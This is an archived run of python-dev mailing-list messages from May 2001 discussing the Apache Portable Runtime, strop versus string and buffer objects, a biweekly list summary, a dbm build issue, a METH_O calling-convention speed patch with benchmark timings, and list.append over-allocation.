<200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> <3B0CFD12.164271D8@lemburg.com> Message-ID: <20010524055555.B5402@lyra.org> On Thu, May 24, 2001 at 02:22:42PM +0200, M.-A. Lemburg wrote: > "Barry A. Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > > > GS> Toss out a ton of the platform-specific stuff in Python and > > GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but > > GS> it could also help with loading shared libraries, threading, > > GS> mmap'd files, sockets, etc. > > > > I don't know squat about APR, but would it have to be either-or? IOW, > > would it be possible to wrap the APR in a module (or package) and > > provide it as an importable alternative? Sure, that is a possibility, but it doesn't save Python much in terms of maintenance or portability. "Just another library" Truly using it could certainly be done as a slow migration, and it is definitely possible to only use portions, subsets, etc. Another alternative would be to use APR as a "platform target". But that just adds yet another platform to support rather than simplifying. > Should be possible; the problem is: how do you get the APR types > to interact with the original Python ones (e.g. file types). Many The header is a total misnomer, but "apr_portable.h" provides access to an opaque type's underlying native object (many of us aren't sure how Ryan arrived at "portable" being the name for the least-portable aspect of the library :-). Anyways... you can extract a file descriptor from a file or socket or pipe. Or a thread ID from an thread object. etc. > low-level Python functions require the native Python types, so > while wrapping APR as Python module would provide an alternative, that > alternative will most probably not help much w/r to simplifying > portability issues. Right. I'd say use the APR functions unless absolute speed is required (such as the readlines stuff). But you could also argue that the hard-core platform specific optimizations could go into APR itself, so that Python doesn't have to worry about them. > FYI, here's what the APR has to offer (taken from the APRDesign > file that comes with Apache 2.0 beta): > """ > The base types in APR > file_io File I/O, including pipes > lib A portable library originally used in Apache. This contains > memory management, tables, and arrays. > locks Mutex and reader/writer locks > misc Any APR type which doesn't have any other place to belong > network_io Network I/O > shmem Shared Memory (Not currently implemented) > signal Asynchronous Signals > threadproc Threads and Processes > time Time > """ That doc is out of date; the list is missing: shared library handling, i18n, mmap, user information access (e.g. getpwnam), uuid handling, getopt replacements, cryptographic random data, and a few other bits here and there. The shared mem actually is implemented mostly, via the libmm library. And note that some of those topics have some nice depth. As I mentioned, network_io supports IPv6, but also portable name lookups, sendfile(), etc. The file_io stuff support optimized stat() and opendir-type calls for the platform. > It currently supports: Unix (includes BeOS), Win32 and OS/2. A lot more than that :-) Pretty much all the Unix variants, including OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein@lyra.org Thu May 24 14:00:16 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:00:16 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 12:18:50PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> Message-ID: <20010524060016.D5402@lyra.org> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > Greg Stein wrote: >... > > So... my question is: is there any way that we can retain a generic find() > > (and similar functions from the string/strop module) that operates on any > > type that implements the buffer API? > > > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > > implements some standard methods for 8-bit character data (using the buffer > > API), which can be mixed into new Python types" That would reduce the burden > > for new types. > > I suppose that in 2.2 we'll be able to build a class/type > hierarchy which then provides these possibilities. I haven't > followed Guido's latest checkins closely though -- could be that > types don't support multiple inheritence. No idea either... that's why I asked. > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). You're totally missing the point with that suggestion. It does *not* suffice to add them to buffer objects. What about array objects? mmap objects? Random Joe Object who implements the buffer interface? All of those are out of luck. With strop, I can pass any of those objects to strop.find(). That function has a polymorphic argument. In the current arrangement, every object must implement their own .find and .upper and .whatever. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mwh@python.net Thu May 24 14:02:34 2001 From: mwh@python.net (Michael Hudson) Date: Thu, 24 May 2001 14:02:34 +0100 (BST) Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <20010524055555.B5402@lyra.org> Message-ID: I can't think of a good way of expressing this, but I don't think we should try to make writing non cross-platform code in Python impossible. Yes, it should be easy to write x-platform code, but if there's some very specific platform trick I can do with, say, setsockopt, I don't want Python to hide it from me just 'cause it doesn't work on VMS. Maybe this isn't an issue here. On Thu, 24 May 2001, Greg Stein wrote: [...] > That doc is out of date; the list is missing: shared library handling, i18n, > mmap, user information access (e.g. getpwnam), uuid handling, getopt > replacements, cryptographic random data, and a few other bits here and > there. The shared mem actually is implemented mostly, via the libmm library. How big is APR? How stable? (in terms of interface; I'm assuming it doesn't crap out through bad programming or it'd be a non-starter) > And note that some of those topics have some nice depth. As I mentioned, > network_io supports IPv6, but also portable name lookups, sendfile(), etc. > The file_io stuff support optimized stat() and opendir-type calls for the > platform. > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > A lot more than that :-) Pretty much all the Unix variants, including > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. That's still less than Python isn't it? RiscOS, Amiga, PalmOS, VMS, Playstation 2(!), from looking at http://www.python.org/download/download_other.html. Cheers, M. From gstein@lyra.org Thu May 24 14:59:21 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 06:59:21 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100 References: <20010524055555.B5402@lyra.org> Message-ID: <20010524065921.E5402@lyra.org> On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote: > I can't think of a good way of expressing this, but I don't think we > should try to make writing non cross-platform code in Python impossible. I don't think this would preclude writing non cross-platform code. As I mentioned, there isn't anything that would prevent the stuff from working side by side. The idea is to simplify certain aspects of Python's platform specific stuff. For example: all those variants of dynamically loading shared modules (Python/dynload_*.c) can be tossed along with the config magic. > Yes, it should be easy to write x-platform code, but if there's some very > specific platform trick I can do with, say, setsockopt, I don't want > Python to hide it from me just 'cause it doesn't work on VMS. APR isn't a least common denominator approach. >... > > That doc is out of date; the list is missing: shared library handling, i18n, > > mmap, user information access (e.g. getpwnam), uuid handling, getopt > > replacements, cryptographic random data, and a few other bits here and > > there. The shared mem actually is implemented mostly, via the libmm library. > > How big is APR? That's relative :-) On my Linux box, a stripped library is 85k. It is also (theoretically) possible to skip building portions of APR. The APIs and symbols are set up for that, but the autoconf setup isn't yet. If you're embedding a private APR build, then you can fine tune what is needed. However, if you're building a public/shared one, then you wouldn't really want to trim it back like that. > How stable? The existing functionality is quite stable. We just keep adding more, though :-) > (in terms of interface; I'm assuming it > doesn't crap out through bad programming or it'd be a non-starter) hehe... you can call it a non-starter, then. APR assumes you pass it valid pointers and objects. For example, if you call apr_file_read(NULL, NULL, 100), then you'll get a segfault rather than EINVAL. Personally, I find that behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't; and this is a programmer error that needs to be attended to -- throw it in his face) Whether others think that is a non-starter... hard to know :-) [ actually, one of the hardest things to integrate would be APR's memory management approach with Python's ] > > And note that some of those topics have some nice depth. As I mentioned, > > network_io supports IPv6, but also portable name lookups, sendfile(), etc. > > The file_io stuff support optimized stat() and opendir-type calls for the > > platform. > > > > > It currently supports: Unix (includes BeOS), Win32 and OS/2. > > > > A lot more than that :-) Pretty much all the Unix variants, including > > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > That's still less than Python isn't it? RiscOS, Amiga, PalmOS, VMS, > Playstation 2(!), from looking at > http://www.python.org/download/download_other.html. Sure it's smaller. It's a blue sky radical suggestion. No more, no less. :-) I mentioned it because the IPv6 stuff came up. I already know a codebase that has handled all the portability issues. That is a bonus :-) However, for the platforms that APR *does* handle today, that would still be a big code reduction for Python. And in the future? Why not extend APR to those other platforms and reduce the Python code even more. I think shifting Python to a portability library is actually quite an interesting thought experiment. Enough to mention it and get people thinking. I think it could be quite handy for the longer term maintainability. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal@lemburg.com Thu May 24 15:54:24 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 16:54:24 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <3B0D20A0.3C881F89@lemburg.com> Greg Stein wrote: > > On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote: > > Greg Stein wrote: > >... > > > So... my question is: is there any way that we can retain a generic find() > > > (and similar functions from the string/strop module) that operates on any > > > type that implements the buffer API? > > > > > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > > > implements some standard methods for 8-bit character data (using the buffer > > > API), which can be mixed into new Python types" That would reduce the burden > > > for new types. > > > > I suppose that in 2.2 we'll be able to build a class/type > > hierarchy which then provides these possibilities. I haven't > > followed Guido's latest checkins closely though -- could be that > > types don't support multiple inheritence. > > No idea either... that's why I asked. > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > You're totally missing the point with that suggestion. It does *not* suffice > to add them to buffer objects. What about array objects? mmap objects? > Random Joe Object who implements the buffer interface? That's the point: you can wrap all those into a buffer object and then use the buffer object methods to manipulate them. In that sense, buffer objects provide an adaptor to the underlying object which implements the needed methods. > All of those are out of luck. > > With strop, I can pass any of those objects to strop.find(). That function > has a polymorphic argument. > > In the current arrangement, every object must implement their own .find and > .upper and .whatever. > > Cheers, > -g > > -- > Greg Stein, http://www.lyra.org/ -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From skip@pobox.com (Skip Montanaro) Thu May 24 16:55:23 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 24 May 2001 10:55:23 -0500 Subject: [Python-Dev] strop vs. string In-Reply-To: <20010524060016.D5402@lyra.org> References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> Message-ID: <15117.12011.323759.496982@beluga.mojam.com> Greg> With strop, I can pass any of those objects to strop.find(). That Greg> function has a polymorphic argument. Where doesn't strop compile/run? If it works everywhere, either just rename it to be the string module (copying any bits from the existing string module that it doesn't yet have) or rename it something like buffer_funcs. Skip From skip@pobox.com (Skip Montanaro) Thu May 24 16:58:24 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 24 May 2001 10:58:24 -0500 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: References: <20010524055555.B5402@lyra.org> Message-ID: <15117.12192.114564.111578@beluga.mojam.com> >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. >> >> A lot more than that :-) Pretty much all the Unix variants, including >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, Michael> VMS, Playstation 2(!), Not to mention MacOS < X... ;-) Skip From mwh@python.net Thu May 24 17:38:37 2001 From: mwh@python.net (Michael Hudson) Date: Thu, 24 May 2001 17:38:37 +0100 (BST) Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24 Message-ID: This is a summary of traffic on the python-dev mailing list between May 10 and May 24 (inclusive) 2001. It is intended to inform the wider Python community of ongoing developments. To comment, just post to python-list@python.org or comp.lang.python in the usual way. Give your posting a meaningful subject line, and if it's about a PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep iteration) All python-dev members are interested in seeing ideas discussed by the community, so don't hesitate to take a stance on a PEP if you have an opinion. This is the eighth summary written by Michael Hudson. Summaries are archived at: Posting distribution (with apologies to mbm) Number of articles in summary: 322 | [|] | [|] 30 | [|] | [|] [|] [|] [|] | [|] [|] [|] [|] | [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] 20 | [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] 10 | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] 0 +-023-025-017-018-028-031-036-032-025-002-015-018-020-032 Thu 10| Sat 12| Mon 14| Wed 16| Fri 18| Sun 20| Tue 22| Fri 11 Sun 13 Tue 15 Thu 17 Sat 19 Mon 21 Wed 23 Pretty busy fortnight. The above distribution may be somewhat skewed because I changed my subscription address to python-dev and was unsubscribed for a while. Although any impact this had is probably countered by ESR and Barry's discussion of "Puffy the Frog"... * Type/class * Paul Prescod has been keeping an eye on Guido's descr-branch work, and posted concerns about when objects will have a __dict__: Then there was more technical discussion about subclassing builtin types and Steven Majewski evangelising prototype-based OO languages (though I'm not sure why!). * Easy codec access * Marc-Andre Lemburg checked in his decode string method patch, and some new codecs so you can now do things like: >>> "abc".encode('zlib').encode('base64') 'eJxLTEoGAAJNASc=\n' >>> _.decode('base64').decode('zlib') 'abc' There was a small discussion on what other codecs might be handy and Guido added quoted-printable to check it was easy. * Performance * The big discussion(s) on python-dev over the past fourteen days has centred on performance, especially on that of comparisons and the related area of dict performance. It all started with Tim Peters running a simple test program on 2.0, 2.1 and current CVS: The discussion had an unusual flavour for one about performance: a concentration on measuring performance numbers and making sure that the optimizations being discussed actually improved these numbers. This is hard; everyone wants to speed the "typical Python app" but of course there is no such thing; people have been using, amongst others, pystone, pybench and the test suite, none of which are particularly good candidates... Tim posted the distribution of sizes of dicts in a run of the test suite: which showed that small dicts are overwhelmingly the commonest. Marc piped up with an old optimization idea of his: He posted a patch to sourceforge, Tim rewrote it and checked it in, so dicts should be a little faster in 2.2. But as I said, the discussion was kicked off by the performance of comparisons, especially strings. Martin von Loewis posted some statistics from an instrumented interpreter: The issue is that the rich comparisons of Python 2.1 have added a layer of complexity to the comparisons code. Although the rich comparisons (might) provide an opportunity for faster code in some circumstances, code that still uses old-style comparisons can and does take a hit. Strings still use the old-style comparisons and are compared a *lot* (especially in dicts), so it seems "upgrading" them to rich comparisons should be a win and Marc posted a patch to sf that does this. Marc also managed to promise to make a concerted effort to find speed optimizations in the next few months: Finally, in a coda Jeremy noticed that Python spends an alarming amount of time decoding those "Oi|s#" strings that get passed to PyArg_ParseTuple: and Tim pointed out that optimizing "O" might be a win: * FP vs. tutorial * Tim pointed out that the tutorial currently contains examples of floating point output that is platform dependent, and that this is bad. He proposed changing the tutorial to only use fractions that can be exactly represented as floats, and adding a discussion (possibly in an appendix) of the reasons why >>> 0.1 0.10000000000000001 is not broken. There was a discussion of how detailed the discussion should be where the point was made that it's not really important to explain precisely *why* this happens, but it suffices to convince the newbie that floating point is more complicated than he or she thinks. Lets hope that suitable text is composed soon, and that people actually read it ... there have been two "floating point is broken" bug reports on sourceforge in just the last week. * unifying os.rename semantics across platforms * Skip pointed out that os.rename behaves differently on Posix and Windows platforms when the destination file exists: on Posix the destination is silently replaced in an atomic operation, whereas on Windows an exception is raised. Skip proposed enforcing posix semantics everywhere, but this has two problems (a) it's backwards incompatible (b) it's impossible (you can't avoid the race condition on Windows). So maybe we'll just settle for better documentation. * Python 2.1.1 * Thomas Wouters started back-porting bug fixes to the 2,1-maint branch in preparation for a 2.1.1 release. There is as yet no firm - or even vague - plans about release dates. * Daily Python-URL on your Palm * Marc-Andre Lemburg announced that you can now read Pythonware's Daily Python-URL on your Palm Pilot as an AvantGo channel: Cheers, M. From gstein@lyra.org Thu May 24 20:45:18 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 12:45:18 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200 References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <20010524124518.N5402@lyra.org> On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote: >... > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. That would certainly be a valid solution. And at the C level, we could share functions between PyBufferObject and PyStringObject. Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein@lyra.org Thu May 24 21:07:43 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 13:07:43 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500 References: <20010524055555.B5402@lyra.org> <15117.12192.114564.111578@beluga.mojam.com> Message-ID: <20010524130743.O5402@lyra.org> On Thu, May 24, 2001 at 10:58:24AM -0500, skip@pobox.com wrote: > > >> > It currently supports: Unix (includes BeOS), Win32 and OS/2. > >> > >> A lot more than that :-) Pretty much all the Unix variants, including > >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs. > > Michael> That's still less than Python isn't it? RiscOS, Amiga, PalmOS, > Michael> VMS, Playstation 2(!), > > Not to mention MacOS < X... ;-) As I mentioned, MacOS X is already there. MacOS Classic is not. But the presence of a portability library such as APR does not exclude the use of direct platform hooks where/when necessary. For a bunch of stuff, you use APR [to reduce complexity/maintenance]. For the rest, you go native just like today. Cheers, -g -- Greg Stein, http://www.lyra.org/ From skip@pobox.com (Skip Montanaro) Thu May 24 22:15:48 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 24 May 2001 16:15:48 -0500 Subject: [Python-Dev] Odd message from test_dbm Message-ID: <15117.31236.804746.160037@beluga.mojam.com> I just noticed this message when running make test: test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip them... Anybody else seen this? Skip From thomas@xs4all.net Thu May 24 22:42:58 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 23:42:58 +0200 Subject: [Python-Dev] Odd message from test_dbm In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500 References: <15117.31236.804746.160037@beluga.mojam.com> Message-ID: <20010524234258.I690@xs4all.nl> On Thu, May 24, 2001 at 04:15:48PM -0500, skip@pobox.com wrote: > I just noticed this message when running make test: > test test_dbm skipped -- /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey > I'm running a vanilla Mandrake 8.0 system. Unfortunately, I can't check > libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip > them... The problem is that the dbmmodule isn't linked to the right library. Debian has a similar (if not the same) problem. setup.py doesn't try hard enough to figure out the right library to link with; it checks for libndbm, but not libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm.) I *think* all it needs to do is check for libdbm as well as libndbm, but this might pick up old/incompatible libraries on some platforms, and it might still require fiddling of include paths on others. I seem to recall you had to include either /usr/include/db1/ndbm.h (to use libdbm) or /usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm 'emulation') but I gave up in frustration trying to figure out the difference :P -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From greg@cosc.canterbury.ac.nz Fri May 25 03:45:01 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 25 May 2001 14:45:01 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0CE00A.488C8D73@lemburg.com> Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > BTW, wouldn't it suffice to add these methods to buffer objects ? > Then you could write: buffer(ob).find('.'). Aren't buffer objects as they're currently implemented inherently dangerous? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From martin@loewis.home.cs.tu-berlin.de Fri May 25 07:00:47 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 25 May 2001 08:00:47 +0200 Subject: [Python-Dev] Special-casing "O" Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> > Special-casing the snot out of "O" looks like a winner : I have a patch on SF that takes this approach: http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 The idea is that functions can be declared as METH_O, instead of METH_VARARGS. I also offer METH_l, but this is currently not used. The approach could be extended to other signatures, e.g. METH_O_opt_O (i.e. "O|O"). Some signatures cannot be changed into special-calls, e.g. "O!", or "ll|l". In the PyXML test suite, "O" is indeed the most frequent case (72%), and it is primarily triggered through len (26%), append (24%), and ord (6%). These are the only functions that make use of the new calling conventions at the moment. If you look at the patch, you'll see that it is quite easy to change a method to use a different calling convention (basically just remove the PyArg_ParseTuple call). To measure the patch, I use the script from time import clock indices = [1] * 20000 indices1 = indices*100 r1 = [1]*60 def doit(case): s = clock() i = 0 if case == 0: f = ord for i in indices1: f("o") elif case == 1: for i in indices: l = [] f = l.append for i in r1: f(i) elif case == 2: f = len for i in indices1: f("o") f = clock() return f - s for i in xrange(10): print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2)) Without the patch, (almost) stock CVS gives 2.190 1.800 2.240 2.200 1.800 2.220 2.200 1.800 2.230 2.220 1.800 2.220 2.200 1.800 2.220 2.200 1.790 2.240 2.200 1.790 2.230 2.200 1.800 2.220 2.200 1.800 2.240 2.200 1.790 2.230 With the patch, I get 1.440 1.330 1.460 1.420 1.350 1.440 1.430 1.340 1.430 1.510 1.350 1.460 1.440 1.360 1.470 1.460 1.330 1.450 1.430 1.330 1.420 1.440 1.340 1.440 1.430 1.340 1.430 1.410 1.340 1.450 So the speed-up is roughly 30% to 50%, depending on how much work the function has to do. Please let me know what you think. Regards, Martin From mal@lemburg.com Fri May 25 09:23:10 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:23:10 +0200 Subject: [Python-Dev] strop vs. string References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> Message-ID: <3B0E166E.581816AA@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > Then you could write: buffer(ob).find('.'). > > Aren't buffer objects as they're currently implemented > inherently dangerous? Why should they be ? -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Fri May 25 09:56:12 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 10:56:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: <3B0E1E2C.4BC121B5@lemburg.com> "Martin v. Loewis" wrote: > > > Special-casing the snot out of "O" looks like a winner : > > I have a patch on SF that takes this approach: > > http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470 > > The idea is that functions can be declared as METH_O, instead of > METH_VARARGS. I also offer METH_l, but this is currently not used. The > approach could be extended to other signatures, e.g. METH_O_opt_O > (i.e. "O|O"). Some signatures cannot be changed into special-calls, > e.g. "O!", or "ll|l". > > [benchmark] > So the speed-up is roughly 30% to 50%, depending on how much work the > function has to do. > > Please let me know what you think. Great idea, Martin. One suggestion though: I would change is the way the function is "declared" in the method list. Your currently use: {"append", (PyCFunction)listappend, METH_O, append_doc}, Now this would be more flexible if you would implement a scheme which lets us put the parser string into the method list. The call mechanism could then easily figure out how to call the method and it would also be more easily extensible: {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, This would then (just like in your patch) call the listappend function with the parser arguments inlined into the C call: listappend(self, arg0) A parser marker "OO" would then call a method like this: method(self, arg0, arg1) and so on. This approach costs a little more (the string compare), but should provide a more direct way of converting existing functions to the new convention (just copy&paste the PyArg_ParseTuple() argument) and also allows implementing a generic scheme which then again relies on PyArg_ParseTuple() to do the argument parsing, e.g. "is#" could be implemented as: PyObject *method(PyObject self, int arg0, char *arg1, int *arg1_len) For optional arguments we'd need some convention which then lets the called function add the default value as needed. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From ping@lfw.org Fri May 25 11:56:33 2001 From: ping@lfw.org (Ka-Ping Yee) Date: Fri, 25 May 2001 05:56:33 -0500 (CDT) Subject: [Python-Dev] May 25 is Towel Day (towelday.org) Message-ID: If you have enjoyed Douglas Adams' works, please consider carrying or wearing a towel with you everywhere today, May 25, as a tribute and in his memory. For more about Towel Day, visit http://www.towelday.org/. My apologies for being off-topic. -- ?!ng From gstein@lyra.org Fri May 25 12:59:23 2001 From: gstein@lyra.org (Greg Stein) Date: Fri, 25 May 2001 04:59:23 -0700 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 10:23:10AM +0200 References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com> Message-ID: <20010525045923.C12056@lyra.org> On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote: > Greg Ewing wrote: > > "M.-A. Lemburg" : > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > Aren't buffer objects as they're currently implemented > > inherently dangerous? > > Why should they be ? The buffer object caches the pointer from getreadbuffer and friends. If the target object changes that pointer (internally), then the buffer object's value is stale. But that is a bug fix; it is independent of the discussion at hand. Cheers, -g -- Greg Stein, http://www.lyra.org/ From Barrett@stsci.edu Fri May 25 14:21:20 2001 From: Barrett@stsci.edu (Paul Barrett) Date: Fri, 25 May 2001 09:21:20 -0400 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> Message-ID: <3B0E5C50.6E365F69@STScI.Edu> "M.-A. Lemburg" wrote: > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > Then you could write: buffer(ob).find('.'). > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? > > That's the point: you can wrap all those into a buffer object > and then use the buffer object methods to manipulate them. In > that sense, buffer objects provide an adaptor to the underlying > object which implements the needed methods. Sounds like you are trying to make the buffer object into something it is not. Not that I have the foggiest idea what it is now, since it hasn't much use and is badly broken. I like your idea of sharing functions, I just don't think the buffer object is the proper means. I think the buffer object should be removed from Python and something better put in its place. (I'm not talking about the buffer C/API, though this could also use an overhaul, since it doesn't provide enough information to the receiving method.) What I think we need is: 1) a malloc object which has a similar interface to the mmap object with access protection, etc. This object would be the fundamental way of getting memory. The string object would use it to allocate a chunk of 'read-only' memory. Other objects would then know not to modify the contents of the memory. If you wanted a reference or view of the memory/buffer, you would get a reference to this object. 2) objects supporting the buffer object should provide a view method which returns a copy of themselves (and hence all their methods) and can be used to get a pointer to a subset of its memory. In this way the type of memory/buffer being accessed is known compared to the current buffer object which only indicates the buffer is binary or char data. In essence information about how the buffer should be used is lost in the current buffer C/API. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From guido@digicool.com Fri May 25 15:29:28 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 25 May 2001 10:29:28 -0400 Subject: [Python-Dev] Vacation Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com> I will be on vacation next week without net access. Back on June 4th! There's a bunch of stuff that happened on the mailing list that I expect I won't get to -- I've got to finish up some high priority work for Digital Creations before I can leave. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Fri May 25 20:06:16 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 25 May 2001 15:06:16 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: c.l.py has rediscovered the quadratic-time worst-case behavior of list.append(). That is, do list.append(x) in a long loop. Linux users don't see anything particularly bad no matter how big the loop. WinNT eventually displays clear quadratic-time behavior. Win9x dies surprisingly early with a MemoryError, despite gobs of memory free: turns out Win9x allocates hundreds of virtual heaps, isn't able to coalesce them, and you actually run out of *address space* (the whole 2GB user space gets fragmented beyond hope). People on other platforms have reported other bad behaviors over the years. I don't want to argue about this again , I just want to know whether the patch below slows anything down on your oddball box. It increases the over-allocation amount in several more layers. Also replaces integer * and / in the over-allocation computation by bit operations (integer / in particular is very slow on *some* boxes). Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution. Index: Objects/listobject.c =================================================================== RCS file: 